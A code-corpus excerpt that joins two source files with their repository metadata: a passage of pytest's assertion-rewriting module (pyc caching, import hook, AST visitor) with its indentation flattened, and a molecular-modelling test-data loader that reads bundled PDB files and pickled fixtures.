cache_name = fn_pypath.basename[:-3] + PYC_TAIL
pyc = os.path.join(cache_dir, cache_name)
# Notice that even if we're in a read-only directory, I'm going
# to check for a cached pyc. This may not be optimal...
co = _read_pyc(fn_pypath, pyc, state.trace)
if co is None:
state.trace("rewriting %r" % (fn,))
source_stat, co = _rewrite_test(self.config, fn_pypath)
if co is None:
# Probably a SyntaxError in the test.
return None
if write:
self._writing_pyc = True
try:
_write_pyc(state, co, source_stat, pyc)
finally:
self._writing_pyc = False
else:
state.trace("found cached rewritten pyc for %r" % (fn,))
self.modules[name] = co, pyc
return self
def _early_rewrite_bailout(self, name, state):
"""
This is a fast way to get out of rewriting modules. Profiling has
shown that the call to imp.find_module (inside of the find_module
from this class) is a major slowdown, so, this method tries to
filter what we're sure won't be rewritten before getting to it.
"""
if self.session is not None and not self._session_paths_checked:
self._session_paths_checked = True
for path in self.session._initialpaths:
# Make something as c:/projects/my_project/path.py ->
# ['c:', 'projects', 'my_project', 'path.py']
parts = str(path).split(os.path.sep)
# add 'path' to basenames to be checked.
self._basenames_to_check_rewrite.add(os.path.splitext(parts[-1])[0])
# Note: conftest already by default in _basenames_to_check_rewrite.
parts = name.split(".")
if parts[-1] in self._basenames_to_check_rewrite:
return False
# For matching the name it must be as if it was a filename.
path = PurePath(os.path.sep.join(parts) + ".py")
for pat in self.fnpats:
# if the pattern contains subdirectories ("tests/**.py" for example) we can't bail out based
# on the name alone because we need to match against the full path
if os.path.dirname(pat):
return False
if fnmatch_ex(pat, path):
return False
if self._is_marked_for_rewrite(name, state):
return False
state.trace("early skip of rewriting module: %s" % (name,))
return True
def _should_rewrite(self, name, fn_pypath, state):
# always rewrite conftest files
fn = str(fn_pypath)
if fn_pypath.basename == "conftest.py":
state.trace("rewriting conftest file: %r" % (fn,))
return True
if self.session is not None:
if self.session.isinitpath(fn):
state.trace("matched test file (was specified on cmdline): %r" % (fn,))
return True
# modules not passed explicitly on the command line are only
# rewritten if they match the naming convention for test files
for pat in self.fnpats:
if fn_pypath.fnmatch(pat):
state.trace("matched test file %r" % (fn,))
return True
return self._is_marked_for_rewrite(name, state)
def _is_marked_for_rewrite(self, name, state):
try:
return self._marked_for_rewrite_cache[name]
except KeyError:
for marked in self._must_rewrite:
if name == marked or name.startswith(marked + "."):
state.trace("matched marked file %r (from %r)" % (name, marked))
self._marked_for_rewrite_cache[name] = True
return True
self._marked_for_rewrite_cache[name] = False
return False
def mark_rewrite(self, *names):
"""Mark import names as needing to be rewritten.
The named module or package as well as any nested modules will
be rewritten on import.
"""
already_imported = (
set(names).intersection(sys.modules).difference(self._rewritten_names)
)
for name in already_imported:
if not AssertionRewriter.is_rewrite_disabled(
sys.modules[name].__doc__ or ""
):
self._warn_already_imported(name)
self._must_rewrite.update(names)
self._marked_for_rewrite_cache.clear()
def _warn_already_imported(self, name):
from _pytest.warning_types import PytestWarning
from _pytest.warnings import _issue_warning_captured
_issue_warning_captured(
PytestWarning("Module already imported so cannot be rewritten: %s" % name),
self.config.hook,
stacklevel=5,
)
def load_module(self, name):
co, pyc = self.modules.pop(name)
if name in sys.modules:
# If there is an existing module object named 'fullname' in
# sys.modules, the loader must use that existing module. (Otherwise,
# the reload() builtin will not work correctly.)
mod = sys.modules[name]
else:
# I wish I could just call imp.load_compiled here, but __file__ has to
# be set properly. In Python 3.2+, this all would be handled correctly
# by load_compiled.
mod = sys.modules[name] = imp.new_module(name)
try:
mod.__file__ = co.co_filename
# Normally, this attribute is 3.2+.
mod.__cached__ = pyc
mod.__loader__ = self
# Normally, this attribute is 3.4+
mod.__spec__ = spec_from_file_location(name, co.co_filename, loader=self)
six.exec_(co, mod.__dict__)
except: # noqa
if name in sys.modules:
del sys.modules[name]
raise
return sys.modules[name]
def is_package(self, name):
try:
fd, fn, desc = self._imp_find_module(name)
except ImportError:
return False
if fd is not None:
fd.close()
tp = desc[2]
return tp == imp.PKG_DIRECTORY
@classmethod
def _register_with_pkg_resources(cls):
"""
Ensure package resources can be loaded from this loader. May be called
multiple times, as the operation is idempotent.
"""
try:
import pkg_resources
# access an attribute in case a deferred importer is present
pkg_resources.__name__
except ImportError:
return
# Since pytest tests are always located in the file system, the
# DefaultProvider is appropriate.
pkg_resources.register_loader_type(cls, pkg_resources.DefaultProvider)
def get_data(self, pathname):
"""Optional PEP302 get_data API.
"""
with open(pathname, "rb") as f:
return f.read()
def _write_pyc(state, co, source_stat, pyc):
# Technically, we don't have to have the same pyc format as
# (C)Python, since these "pycs" should never be seen by builtin
# import. However, there's little reason deviate, and I hope
# sometime to be able to use imp.load_compiled to load them. (See
# the comment in load_module above.)
try:
with atomicwrites.atomic_write(pyc, mode="wb", overwrite=True) as fp:
fp.write(imp.get_magic())
# as of now, bytecode header expects 32-bit numbers for size and mtime (#4903)
mtime = int(source_stat.mtime) & 0xFFFFFFFF
size = source_stat.size & 0xFFFFFFFF
# "<LL" stands for 2 unsigned longs, little-ending
fp.write(struct.pack("<LL", mtime, size))
fp.write(marshal.dumps(co))
except EnvironmentError as e:
state.trace("error writing pyc file at %s: errno=%s" % (pyc, e.errno))
# we ignore any failure to write the cache file
# there are many reasons, permission-denied, __pycache__ being a
# file etc.
return False
return True
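# Illustrative note, not part of the original: the cached pyc written above is
# laid out as imp.get_magic() (4 bytes) + struct.pack("<LL", mtime, size)
# (two 32-bit little-endian unsigned longs) + marshal.dumps(co); _read_pyc()
# below validates exactly that 12-byte prefix before unmarshalling the code.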
RN = "\r\n".encode("utf-8")
N = "\n".encode("utf-8")
cookie_re = re.compile(r"^[ \t\f]*#.*coding[:=][ \t]*[-\w.]+")
BOM_UTF8 = "\xef\xbb\xbf"
def _rewrite_test(config, fn):
"""Try to read and rewrite *fn* and return the code object."""
state = config._assertstate
try:
stat = fn.stat()
source = fn.read("rb")
except EnvironmentError:
return None, None
if ASCII_IS_DEFAULT_ENCODING:
# ASCII is the default encoding in Python 2. Without a coding
# declaration, Python 2 will complain about any bytes in the file
# outside the ASCII range. Sadly, this behavior does not extend to
# compile() or ast.parse(), which prefer to interpret the bytes as
# latin-1. (At least they properly handle explicit coding cookies.) To
# preserve this error behavior, we could force ast.parse() to use ASCII
# as the encoding by inserting a coding cookie. Unfortunately, that
# messes up line numbers. Thus, we have to check ourselves if anything
# is outside the ASCII range in the case no encoding is explicitly
# declared. For more context, see issue #269. Yay for Python 3 which
# gets this right.
end1 = source.find("\n")
end2 = source.find("\n", end1 + 1)
if (
not source.startswith(BOM_UTF8)
and cookie_re.match(source[0:end1]) is None
and cookie_re.match(source[end1 + 1 : end2]) is None
):
if hasattr(state, "_indecode"):
# encodings imported us again, so don't rewrite.
return None, None
state._indecode = True
try:
try:
source.decode("ascii")
except UnicodeDecodeError:
# Let it fail in real import.
return None, None
finally:
del state._indecode
try:
tree = ast.parse(source, filename=fn.strpath)
except SyntaxError:
# Let this pop up again in the real import.
state.trace("failed to parse: %r" % (fn,))
return None, None
rewrite_asserts(tree, fn, config)
try:
co = compile(tree, fn.strpath, "exec", dont_inherit=True)
except SyntaxError:
# It's possible that this error is from some bug in the
# assertion rewriting, but I don't know of a fast way to tell.
state.trace("failed to compile: %r" % (fn,))
return None, None
return stat, co
def _read_pyc(source, pyc, trace=lambda x: None):
"""Possibly read a pytest pyc containing rewritten code.
Return rewritten code if successful or None if not.
"""
try:
fp = open(pyc, "rb")
except IOError:
return None
with fp:
try:
mtime = int(source.mtime())
size = source.size()
data = fp.read(12)
except EnvironmentError as e:
trace("_read_pyc(%s): EnvironmentError %s" % (source, e))
return None
# Check for invalid or out of date pyc file.
if (
len(data) != 12
or data[:4] != imp.get_magic()
or struct.unpack("<LL", data[4:]) != (mtime & 0xFFFFFFFF, size & 0xFFFFFFFF)
):
trace("_read_pyc(%s): invalid or out of date pyc" % source)
return None
try:
co = marshal.load(fp)
except Exception as e:
trace("_read_pyc(%s): marshal.load error %s" % (source, e))
return None
if not isinstance(co, types.CodeType):
trace("_read_pyc(%s): not a code object" % source)
return None
return co
def rewrite_asserts(mod, module_path=None, config=None):
"""Rewrite the assert statements in mod."""
AssertionRewriter(module_path, config).run(mod)
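# --- Illustrative sketch, not part of pytest ------------------------------------
# How the entry point above is typically driven: parse a module, rewrite its
# asserts in place, then compile the modified tree. The source string and the
# "<demo>" filename are hypothetical.
def _demo_rewrite_asserts():
    demo_source = "def test_demo():\n    assert (1 + 1) == 3\n"
    demo_tree = ast.parse(demo_source)
    rewrite_asserts(demo_tree)  # mutates demo_tree in place
    return compile(demo_tree, "<demo>", "exec", dont_inherit=True)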
def _saferepr(obj):
"""Get a safe repr of an object for assertion error messages.
The assertion formatting (util.format_explanation()) requires
newlines to be escaped since they are a special character for it.
Normally assertion.util.format_explanation() does this but for a
custom repr it is possible to contain one of the special escape
sequences, especially '\n{' and '\n}' are likely to be present in
JSON reprs.
"""
r = saferepr(obj)
# only occurs in python2.x, repr must return text in python3+
if isinstance(r, bytes):
# Represent unprintable bytes as `\x##`
r = u"".join(
u"\\x{:x}".format(ord(c)) if c not in string.printable else c.decode()
for c in r
)
return r.replace(u"\n", u"\\n")
def _format_assertmsg(obj):
"""Format the custom assertion message given.
For strings this simply replaces newlines with '\n~' so that
util.format_explanation() will preserve them instead of escaping
newlines. For other objects saferepr() is used first.
"""
# reprlib appears to have a bug which means that if a string
# contains a newline it gets escaped, however if an object has a
# .__repr__() which contains newlines it does not get escaped.
# However in either case we want to preserve the newline.
replaces = [(u"\n", u"\n~"), (u"%", u"%%")]
if not isinstance(obj, six.string_types):
obj = saferepr(obj)
replaces.append((u"\\n", u"\n~"))
if isinstance(obj, bytes):
replaces = [(r1.encode(), r2.encode()) for r1, r2 in replaces]
for r1, r2 in replaces:
obj = obj.replace(r1, r2)
return obj
def _should_repr_global_name(obj):
if callable(obj):
return False
try:
return not hasattr(obj, "__name__")
except Exception:
return True
def _format_boolop(explanations, is_or):
explanation = "(" + (is_or and " or " or " and ").join(explanations) + ")"
if isinstance(explanation, six.text_type):
return explanation.replace(u"%", u"%%")
else:
return explanation.replace(b"%", b"%%")
def _call_reprcompare(ops, results, expls, each_obj):
for i, res, expl in zip(range(len(ops)), results, expls):
try:
done = not res
except Exception:
done = True
if done:
break
if util._reprcompare is not None:
custom = util._reprcompare(ops[i], each_obj[i], each_obj[i + 1])
if custom is not None:
return custom
return expl
unary_map = {ast.Not: "not %s", ast.Invert: "~%s", ast.USub: "-%s", ast.UAdd: "+%s"}
binop_map = {
ast.BitOr: "|",
ast.BitXor: "^",
ast.BitAnd: "&",
ast.LShift: "<<",
ast.RShift: ">>",
ast.Add: "+",
ast.Sub: "-",
ast.Mult: "*",
ast.Div: "/",
ast.FloorDiv: "//",
ast.Mod: "%%", # escaped for string formatting
ast.Eq: "==",
ast.NotEq: "!=",
ast.Lt: "<",
ast.LtE: "<=",
ast.Gt: ">",
ast.GtE: ">=",
ast.Pow: "**",
ast.Is: "is",
ast.IsNot: "is not",
ast.In: "in",
ast.NotIn: "not in",
}
# Python 3.5+ compatibility
try:
binop_map[ast.MatMult] = "@"
except AttributeError:
pass
# Python 3.4+ compatibility
if hasattr(ast, "NameConstant"):
_NameConstant = ast.NameConstant
else:
def _NameConstant(c):
return ast.Name(str(c), ast.Load())
def set_location(node, lineno, col_offset):
"""Set node location information recursively."""
def _fix(node, lineno, col_offset):
if "lineno" in node._attributes:
node.lineno = lineno
if "col_offset" in node._attributes:
node.col_offset = col_offset
for child in ast.iter_child_nodes(node):
_fix(child, lineno, col_offset)
_fix(node, lineno, col_offset)
return node
class AssertionRewriter(ast.NodeVisitor):
"""Assertion rewriting implementation.
The main entrypoint is to call .run() with an ast.Module instance,
this will then find all the assert statements and rewrite them to
provide intermediate values and a detailed assertion error. See
http://pybites.blogspot.be/2011/07/behind-scenes-of-pytests-new-assertion.html
for an overview of how this works.
The entry point here is .run() which will iterate over all the
statements in an ast.Module and for each ast.Assert statement it
finds call .visit() with it. Then .visit_Assert() takes over and
is responsible for creating new ast statements to replace the
original assert statement: it rewrites the test of an assertion
to provide intermediate values and replace it with an if statement
which raises an assertion error with a detailed explanation in
case the expression is false.
For this .visit_Assert() uses the visitor pattern to visit all the
AST nodes of the ast.Assert.test field, each visit call returning
an AST node and the corresponding explanation string. During this
state is kept in several instance attributes:
:statements: All the AST statements which will replace the assert
statement.
:variables: This is populated by .variable() with each variable
used by the statements so that they can all be set to None at
the end of the statements.
:variable_counter: Counter to create new unique variables needed
by statements. Variables are created using .variable() and
have the form of "@py_assert0".
:on_failure: The AST statements which will be executed if the
assertion test fails. This is the code which will construct
the failure message and raises the AssertionError.
:explanation_specifiers: A dict filled by .explanation_param()
with %-formatting placeholders and their corresponding
expressions to use in the building of an assertion message.
This is used by .pop_format_context() to build a message.
:stack: A stack of the explanation_specifiers dicts maintained by
.push_format_context() and .pop_format_context() which allows
to build another %-formatted string while already building one.
This state is reset on every new assert statement visited and used
by the other visitors.
"""
def __init__(self, module_path, config):
super(AssertionRewriter, self).__init__()
self.module_path = module_path
self.config = config
def run(self, mod):
"""Find all assert statements in *mod* and rewrite them."""
if not mod.body:
# Nothing to do.
return
# Insert some special imports at the top of the module but after any
# docstrings and __future__ imports.
aliases = [
ast.alias(six.moves.builtins.__name__, "@py_builtins"),
ast.alias("_pytest.assertion.rewrite", "@pytest_ar"),
]
doc = getattr(mod, "docstring", None)
expect_docstring = doc is None
if doc is not None and self.is_rewrite_disabled(doc):
return
pos = 0
lineno = 1
for item in mod.body:
if (
expect_docstring
and isinstance(item, ast.Expr)
and isinstance(item.value, ast.Str)
):
doc = item.value.s
if self.is_rewrite_disabled(doc):
return
expect_docstring = False
elif (
not isinstance(item, ast.ImportFrom)
or item.level > 0
or item.module != "__future__"
):
lineno = item.lineno
break
pos += 1
else:
lineno = item.lineno
imports = [
ast.Import([alias], lineno=lineno, col_offset=0) for alias in aliases
]
mod.body[pos:pos] = imports
# Collect asserts.
nodes = [mod]
while nodes:
node = nodes.pop()
for name, field in ast.iter_fields(node):
if isinstance(field, list):
new = []
for i, child in enumerate(field):
if isinstance(child, ast.Assert):
# Transform assert.
new.extend(self.visit(child))
else:
new.append(child)
if isinstance(child, ast.AST):
nodes.append(child)
setattr(node, name, new)
elif (
isinstance(field, ast.AST)
# Don't recurse into expressions as they can't contain
# asserts.
and not isinstance(field, ast.expr)
):
nodes.append(field)
@staticmethod
def is_rewrite_disabled(docstring):
return "PYTEST_DONT_REWRITE" in docstring
def variable(self):
"""Get a new variable."""
# Use a character invalid in python identifiers to avoid clashing.
name = "@py_assert" + str(next(self.variable_counter))
self.variables.append(name)
return name
def assign(self, expr):
"""Give *expr* a name."""
name = self.variable()
self.statements.append(ast.Assign([ast.Name(name, ast.Store())], expr))
return ast.Name(name, ast.Load())
def display(self, expr):
"""Call saferepr on the expression."""
return self.helper("saferepr", expr)
def helper(self, name, *args):
"""Call a helper in this module."""
py_name = ast.Name("@pytest_ar", ast.Load())
attr = ast.Attribute(py_name, "_" + name, ast.Load())
return ast_Call(attr, list(args), [])
def builtin(self, name):
"""Return the builtin called *name*."""
builtin_name = ast.Name("@py_builtins", ast.Load())
return ast.Attribute(builtin_name, name, ast.Load())
def explanation_param(self, expr):
"""Return a new named %-formatting placeholder for expr.
This creates a %-formatting placeholder for expr in the
current formatting context, e.g. ``%(py0)s``. The placeholder
and expr are placed in the current format context so that it
can be used on the next call to .pop_format_context().
"""
specifier = "py" + str(next(self.variable_counter))
self.explanation_specifiers[specifier] = expr
return "%(" + specifier + ")s"
def push_format_context(self):
"""Create a new formatting context.
The format context is used for when an explanation wants to
have a variable value formatted in the assertion message. In
this case the value required can be added using
.explanation_param(). Finally .pop_format_context() is used
to format a string of %-formatted values as added by
.explanation_param().
"""
self.explanation_specifiers = {}
self.stack.append(self.explanation_specifiers)
def pop_format_context(self, expl_expr):
"""Format the %-formatted string with current format context.
The expl_expr should be an ast.Str instance constructed from
the %-placeholders created by .explanation_param(). This will
add the required code to format said string to .on_failure and
return the ast.Name instance of the formatted string.
"""
current = self.stack.pop()
if self.stack:
self.explanation_specifiers = self.stack[-1]
keys = [ast.Str(key) for key in current.keys()]
format_dict = ast.Dict(keys, list(current.values()))
form = ast.BinOp(expl_expr, ast.Mod(), format_dict)
name = "@py_format" + str(next(self.variable_counter))
self.on_failure.append(ast.Assign([ast.Name(name, ast.Store())], form))
return ast.Name(name, ast.Load())
def generic_visit(self, node):
"""Handle expressions we don't have custom code for."""
assert isinstance(node, ast.expr)
res = self.assign(node)
return res, self.explanation_param(self.display(res))
def visit_Assert(self, assert_):
"""Return the AST statements to replace the ast.Assert instance.
This rewrites the test of an assertion to provide
intermediate values and replace it with an if statement which
raises an assertion error with a detailed explanation in case
the expression is false.
"""
if isinstance(assert_.test, ast.Tuple) and len(assert_.test.elts) >= 1:
from _pytest.warning_types import PytestWarning
import warnings
warnings.warn_explicit(
PytestWarning("assertion is always true, perhaps remove parentheses?"),
category=None,
filename=str(self.module_path),
lineno=assert_.lineno,
)
self.statements = []
self.variables = []
self.variable_counter = itertools.count()
self.stack = []
self.on_failure = []
self.push_format_context()
# Rewrite assert into a bunch of statements.
top_condition, explanation = self.visit(assert_.test)
# If in a test module, check if directly asserting None, in order to warn [Issue #3191]
if self.module_path is not None:
self.statements.append(
self.warn_about_none_ast(
top_condition, module_path=self.module_path, lineno=assert_.lineno
)
)
# Create failure message.
body = self.on_failure
negation = ast.UnaryOp(ast.Not(), top_condition)
self.statements.append(ast.If(negation, body, []))
if assert_.msg:
assertmsg = self.helper("format_assertmsg", assert_.msg)
explanation = "\n>assert " + explanation
else:
assertmsg = ast.Str("")
explanation = "assert " + explanation
template = ast.BinOp(assertmsg, ast.Add(), ast.Str(explanation))
msg = self.pop_format_context(template)
fmt = self.helper("format_explanation", msg)
err_name = ast.Name("AssertionError", ast.Load())
exc = ast_Call(err_name, [fmt], [])
if sys.version_info[0] >= 3:
raise_ = ast.Raise(exc, None)
else:
raise_ = ast.Raise(exc, None, None)
body.append(raise_)
# Clear temporary variables by setting them to None.
if self.variables:
variables = [ast.Name(name, ast.Store()) for name in self.variables]
clear = ast.Assign(variables, _NameConstant(None))
self.statements.append(clear)
# Fix line numbers.
for stmt in self.statements:
set_location(stmt, assert_.lineno, assert_.col_offset)
return self.statements
def warn_about_none_ast(self, node, module_path, lineno):
"""
Returns an AST issuing a warning if the value of node is `None`.
This is used to warn the user when asserting a function that asserts
internally already.
See issue #3191 for more details.
"""
# Using parse because it is different between py2 and py3.
AST_NONE = ast.parse("None").body[0].value
val_is_none = ast.Compare(node, [ast.Is()], [AST_NONE])
send_warning = ast.parse(
"""
from _pytest.warning_types import PytestWarning
from warnings import warn_explicit
warn_explicit(
PytestWarning('asserting the value None, please use "assert is None"'),
category=None,
filename={filename!r},
lineno={lineno},
)
""".format(
filename=module_path.strpath, lineno=lineno
)
).body
return ast.If(val_is_none, send_warning, [])
def visit_Name(self, name):
# Display the repr of the name if it's a local variable or
# _should_repr_global_name() thinks it's acceptable.
locs = ast_Call(self.builtin("locals"), [], [])
inlocs = ast.Compare(ast.Str(name.id), [ast.In()], [locs])
dorepr = self.helper("should_repr_global_name", name)
test = ast.BoolOp(ast.Or(), [inlocs, dorepr])
expr = ast.IfExp(test, self.display(name), ast.Str(name.id))
return name, self.explanation_param(expr)
def visit_BoolOp(self, boolop):
res_var = self.variable()
expl_list = self.assign(ast.List([], ast.Load()))
app = ast.Attribute(expl_list, "append", ast.Load())
is_or = int(isinstance(boolop.op, ast.Or))
body = save = self.statements
fail_save = self.on_failure
levels = len(boolop.values) - 1
self.push_format_context()
# Process each operand, short-circuting if needed.
for i, v in enumerate(boolop.values):
if i:
fail_inner = []
# cond is set in a prior loop iteration below
self.on_failure.append(ast.If(cond, fail_inner, [])) # noqa
self.on_failure = fail_inner
self.push_format_context()
res, expl = self.visit(v)
body.append(ast.Assign([ast.Name(res_var, ast.Store())], res))
expl_format = self.pop_format_context(ast.Str(expl))
call = ast_Call(app, [expl_format], [])
self.on_failure.append(ast.Expr(call))
if i < levels:
cond = res
if is_or:
cond = ast.UnaryOp(ast.Not(), cond)
inner = []
self.statements.append(ast.If(cond, inner, []))
self.statements = body = inner
self.statements = save
self.on_failure = fail_save
expl_template = self.helper("format_boolop", expl_list, ast.Num(is_or))
expl = self.pop_format_context(expl_template)
return ast.Name(res_var, ast.Load()), self.explanation_param(expl)
def visit_UnaryOp(self, unary):
pattern = unary_map[unary.op.__class__]
operand_res, operand_expl = self.visit(unary.operand)
res = self.assign(ast.UnaryOp(unary.op, operand_res))
return res, pattern % (operand_expl,)
def visit_BinOp(self, binop):
symbol = binop_map[binop.op.__class__]
left_expr, left_expl = self.visit(binop.left)
right_expr, right_expl = self.visit(binop.right)
explanation = "(%s %s %s)" % (left_expl, symbol, right_expl)
res = self.assign(ast.BinOp(left_expr, binop.op, right_expr))
return res, explanation
def visit_Call_35(self, call):
"""
visit `ast.Call` nodes on Python3.5 and after
"""
new_func, func_expl = self.visit(call.func)
arg_expls = []
new_args = []
new_kwargs = []
for arg in call.args:
res, expl = self.visit(arg)
arg_expls.append(expl)
new_args.append(res)
for keyword in call.keywords:
res, expl = self.visit(keyword.value)
new_kwargs.append(ast.keyword(keyword.arg, res))
if keyword.arg:
arg_expls.append(keyword.arg + "=" + expl)
else: # **args have `arg` keywords with an .arg of None
arg_expls.append("**" + expl)
expl = "%s(%s)" % (func_expl, ", ".join(arg_expls))
new_call = ast.Call(new_func, new_args, new_kwargs)
res = self.assign(new_call)
res_expl = self.explanation_param(self.display(res))
outer_expl = "%s\n{%s = %s\n}" % (res_expl, res_expl, expl)
return res, outer_expl
def visit_Starred(self, starred):
# From Python 3.5, a Starred node can appear in a function call
res, expl = self.visit(starred.value)
new_starred = ast.Starred(res, starred.ctx)
return new_starred, "*" + expl
def visit_Call_legacy(self, call):
"""
visit `ast.Call` nodes on 3.4 and below
"""
new_func, func_expl = self.visit(call.func)
arg_expls = []
new_args = []
new_kwargs = []
new_star = new_kwarg = None
for arg in call.args:
res, expl = self.visit(arg)
new_args.append(res)
arg_expls.append(expl)
for keyword in call.keywords:
res, expl = self.visit(keyword.value)
new_kwargs.append(ast.keyword(keyword.arg, res))
arg_expls.append(keyword.arg + "=" + expl)
if call.starargs:
new_star, expl = self.visit(call.starargs)
arg_expls.append("*" + expl)
if call.kwargs:
new_kwarg, expl = self.visit(call.kwargs)
arg_expls.append("**" + expl)
expl = "%s(%s)" % (func_expl, ", ".join(arg_expls))
new_call = ast.Call(new_func, new_args, new_kwargs, new_star, new_kwarg)
res = self.assign(new_call)
res_expl = self.explanation_param(self.display(res))
outer_expl = "%s\n{%s = %s\n}" % (res_expl, res_expl, expl)
return res, outer_expl
# ast.Call signature changed on 3.5,
# conditionally change which method is named
# visit_Call depending on Python version
if sys.version_info >= (3, 5):
visit_Call = visit_Call_35
else:
visit_Call = visit_Call_legacy
def visit_Attribute(self, attr):
if not isinstance(attr.ctx, ast.Load):
return self.generic_visit(attr)
value, value_expl = self.visit(attr.value)
res = self.assign(ast.Attribute(value, attr.attr, ast.Load()))
res_expl = self.explanation_param(self.display(res))
pat = "%s\n{%s = %s.%s\n}"
expl = pat % (res_expl, res_expl, value_expl, attr.attr)
return res, expl
def visit_Compare(self, comp):
self.push_format_context()
left_res, left_expl = self.visit(comp.left)
if isinstance(comp.left, (ast.Compare, ast.BoolOp)):
left_expl = "({})".format(left_expl)
res_variables = [self.variable() for i in range(len(comp.ops))]
load_names = [ast.Name(v, ast.Load()) for v in res_variables]
store_names = [ast.Name(v, ast.Store()) for v in res_variables]
it = zip(range(len(comp.ops)), comp.ops, comp.comparators)
expls = []
syms = []
results = [left_res]
for i, op, next_operand in it:
next_res, next_expl = self.visit(next_operand)
if isinstance(next_operand, (ast.Compare, ast.BoolOp)):
next_expl = "({})".format(next_expl)
results.append(next_res)
sym = binop_map[op.__class__]
syms.append(ast.Str(sym))
expl = "%s %s %s" % (left_expl, sym, next_expl)
expls.append(ast.Str(expl))
res_expr = ast.Compare(left_res, [op], [next_res])
self.statements.append(ast.Assign([store_names[i]], res_expr))
left_res, left_expl = next_res, next_expl
# Use pytest.assertion.util._reprcompare if that's available.
expl_call = self.helper(
"call_reprcompare",
ast.Tuple(syms, ast.Load()),
ast.Tuple(load_names, ast.Load()),
ast.Tuple(expls, ast.Load()),
ast.Tuple(results, ast.Load()),
)
if len(comp.ops) > 1:
res = ast.BoolOp(ast.And(), load_names)
else:
res = load_names[0]
return res, self.explanation_param(self.pop_format_context(expl_call))
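# Illustrative sketch (not part of pytest): conceptually, the visitors above turn
#     assert f(x) == y
# into something equivalent to
#     _res = f(x)
#     _cmp = _res == y
#     if not _cmp:
#         raise AssertionError(format_explanation("assert %r == %r" % (_res, y)))
# with the real rewrite using numbered temporaries, the call_reprcompare hook and the
# format_explanation helper rather than the literal strings shown here.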
|
lmregus/Portfolio
|
python/design_patterns/env/lib/python3.7/site-packages/_pytest/assertion/rewrite.py
|
Python
|
mit
| 41,131
|
[
"VisIt"
] |
bb3e4eb2af604f374286ce29081eda2b73f4739ea8c7a58c931f977e08cc3365
|
from io import StringIO
import sys
import os.path as osp
import pickle
# get the path to this module directory
data_dir = osp.dirname(sys.modules[__name__].__file__)
BEN_file_name = "3ptb_BEN.pdb"
trypsin_file_name = "3ptb_trypsin.pdb"
waters_3ptb_file_name = "3ptb_water.pdb"
BEN_Hs_file_name = "BEN+Hs_3ptb.pdb"
trypsin_Hs_file_name = "trypsin+Hs_3ptb.pdb"
benzamidine_file_name = "benzamidine.mol"
# sEH_Hs_file_name = "sEH_Hs.pdb"
# TPPU_Hs_file_name = "TPPU_Hs.pdb"
Top7_file_name = "Top7_1qys.pdb"
chignolin_file_name = "chignolin_5awl.pdb"
ligand_structure_files = [BEN_file_name, BEN_Hs_file_name]
protein_structure_files = [trypsin_file_name, trypsin_Hs_file_name,
Top7_file_name, chignolin_file_name]
solvent_files = [waters_3ptb_file_name]
structure_files = ligand_structure_files + protein_structure_files + solvent_files
# load each data example as a string
BEN_path = osp.join(data_dir, BEN_file_name)
with open(BEN_path, 'r') as rf:
BEN_3ptb = rf.read()
BEN_Hs_path = osp.join(data_dir, BEN_Hs_file_name)
with open(BEN_Hs_path, 'r') as rf:
BEN_Hs_3ptb = rf.read()
benzamidine_MOL_path = osp.join(data_dir, benzamidine_file_name)
with open(benzamidine_MOL_path, 'r') as rf:
benzamidine_MOL = rf.read()
trypsin_path = osp.join(data_dir, trypsin_file_name)
with open(trypsin_path, 'r') as rf:
trypsin_3ptb = rf.read()
trypsin_Hs_path = osp.join(data_dir, trypsin_Hs_file_name)
with open(trypsin_Hs_path, 'r') as rf:
trypsin_Hs_3ptb = rf.read()
waters_3ptb_path = osp.join(data_dir, waters_3ptb_file_name)
with open(waters_3ptb_path, 'r') as rf:
waters_3ptb = rf.read()
# sEH_Hs_path = osp.join(data_dir, sEH_Hs_file_name)
# with open(sEH_Hs_path, 'r') as rf:
# sEH_Hs_3ptb = rf.read()
# TPPU_Hs_path = osp.join(data_dir, TPPU_Hs_file_name)
# with open(TPPU_Hs_path, 'r') as rf:
# TPPU_Hs_3ptb = rf.read()
Top7_path = osp.join(data_dir, Top7_file_name)
with open(Top7_path, 'r') as rf:
Top7_1qys = rf.read()
chignolin_path = osp.join(data_dir, chignolin_file_name)
with open(chignolin_path, 'r') as rf:
chignolin_5awl = rf.read()
# precomputed molecules with features already detected
# from rdkit feature detection
trypsin_mastmol_path = osp.join(data_dir, "trypsin+features_mastmol.pkl")
with open(trypsin_mastmol_path, 'rb') as pkl_rf:
Trypsin_Molecule = pickle.load(pkl_rf)
# BEN_mastmol_path = osp.join(data_dir, "BEN+features_mastmol.pkl")
# with open(BEN_mastmol_path, 'rb') as pkl_rf:
# BEN_Molecule = pickle.load(pkl_rf)
trypsin_Hs_mastmol_path = osp.join(data_dir, "trypsin+Hs+features_mastmol.pkl")
with open(trypsin_mastmol_path, 'rb') as pkl_rf:
Trypsin_Hs_Molecule = pickle.load(pkl_rf)
# BEN_Hs_mastmol_path = osp.join(data_dir, "BEN+Hs+features_mastmol.pkl")
# with open(BEN_Hs_mastmol_path, 'rb') as pkl_rf:
# BEN_Hs_Molecule = pickle.load(pkl_rf)
# sEH_Hs_mastmol_path = osp.join(data_dir, "sEH+Hs+features_mastmol.pkl")
# with open(sEH_Hs_mastmol_path, 'rb') as pkl_rf:
# sEH_Hs_Molecule = pickle.load(pkl_rf)
# TPPU_Hs_mastmol_path = osp.join(data_dir, "TPPU+Hs+features_mastmol.pkl")
# with open(TPPU_Hs_mastmol_path, 'rb') as pkl_rf:
# TPPU_Hs_Molecule = pickle.load(pkl_rf)
# a SystemType for Tryspin-Benzamidine
Trypsin_Benzamidine_SystemType_path = osp.join(data_dir, "Trypsin_Benzamidine_SystemType.pkl")
with open(Trypsin_Benzamidine_SystemType_path, 'rb') as pkl_rf:
Trypsin_Benzamidine_SystemType = pickle.load(pkl_rf)
# a substantiation of the Trypsin-Benzamidine SystemType from crystal
# structure coordinates
Trypsin_Benzamidine_System_cryst_path = osp.join(data_dir, "Trypsin_Benzamidine_System_cryst.pkl")
with open(Trypsin_Benzamidine_System_cryst_path, 'rb') as pkl_rf:
Trypsin_Benzamidine_System_cryst = pickle.load(pkl_rf)
|
salotz/mast
|
mastic/tests/data/__init__.py
|
Python
|
mit
| 3,805
|
[
"CRYSTAL",
"RDKit"
] |
9b6f93ac9bedb1ce89472638ad7af90e43f8dc52b32341ea92dc2bb637814563
|
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
